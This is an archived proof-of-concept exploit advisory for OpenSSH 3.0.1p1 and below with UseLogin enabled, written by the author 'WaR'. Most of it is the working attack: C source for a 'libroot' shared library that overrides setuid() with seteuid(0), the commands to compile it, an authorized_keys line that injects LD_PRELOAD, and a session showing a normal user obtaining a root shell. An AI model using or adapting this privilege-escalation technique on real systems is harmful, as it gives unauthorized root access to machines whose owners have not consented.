OpenSSH v3.0.1p1 and below root exploit which only works of the administrator has turned on the UseLogin feature. Uses the libroot library. Requires an account on the remote machine.
b785235fe2fbf2c69f44d93ca622e244033585cf6ba64fbd80330fe466a5f2fc
--[ OpenSSH UseLogin bug proof of concept exploit ]--
by [WaR] <war@genhex.org> / http://www.genhex.org
--[ Intro ]--
I was very curious in finding out how to exploit this problem. Although
I don't think anyone uses this feature, I looked into the matter anyway.
Here it goes. It was tested on the following platforms:
- Slackware 7.1 with OpenSSH3.0p1
- RedHat 7.1 with OpenSSH_2.9p2
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
The exploit should work as long as UseLogin does. YMMV.
This is based on libroot from squidge@onyx.infonexus.com,
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
you thought it wouldn't happen again...).
Kudos to pmsac@toxyn.org for his help figuring out the problem with
the Slackware UseLogin, testing on OpenBSD, and giving the ideia for
the seteuid(0) (it originally was a system("/bin/sh");).
--[ Code ]--
Create a lib.c file with the next content:
---8<---
#include <stdio.h>
int setuid(int uid){
printf("setuid() called...\n");
seteuid(0);
}
---8<---
Compile it into a library:
gcc -c -o lib.o lib.c
ld -shared -o libroot.so lib.o
chmod 755 ./libroot.so
Now, for the tricky (*g*) part...
You must have an account on the machine, and create an entry
on $HOME/.ssh/authorized_keys (or authorized_keys2) with:
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>
When sshd receives your connection, it will export this variable
into the environment *BEFORE* running login. Somewhere after this,
it executes a setuid. When it does, it makes a seteuid(0).
$ id
uid=1000(war) gid=100(users) groups=100(users)
$ ssh war@localhost
Enter passphrase for key '/home/war/.ssh/id_dsa':
sh-2.04# id
uid=0(root) gid=100(users) groups=100(users)
It also works remotely. Anyway, you _MUST_ have an account on
the victim machine so you can setup the enviroment, and login.
And obviously (duh) it must have UseLogin enabled.
That's all.
shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.
-- [WaR]
"If you can't hack it, hit it with a hammer"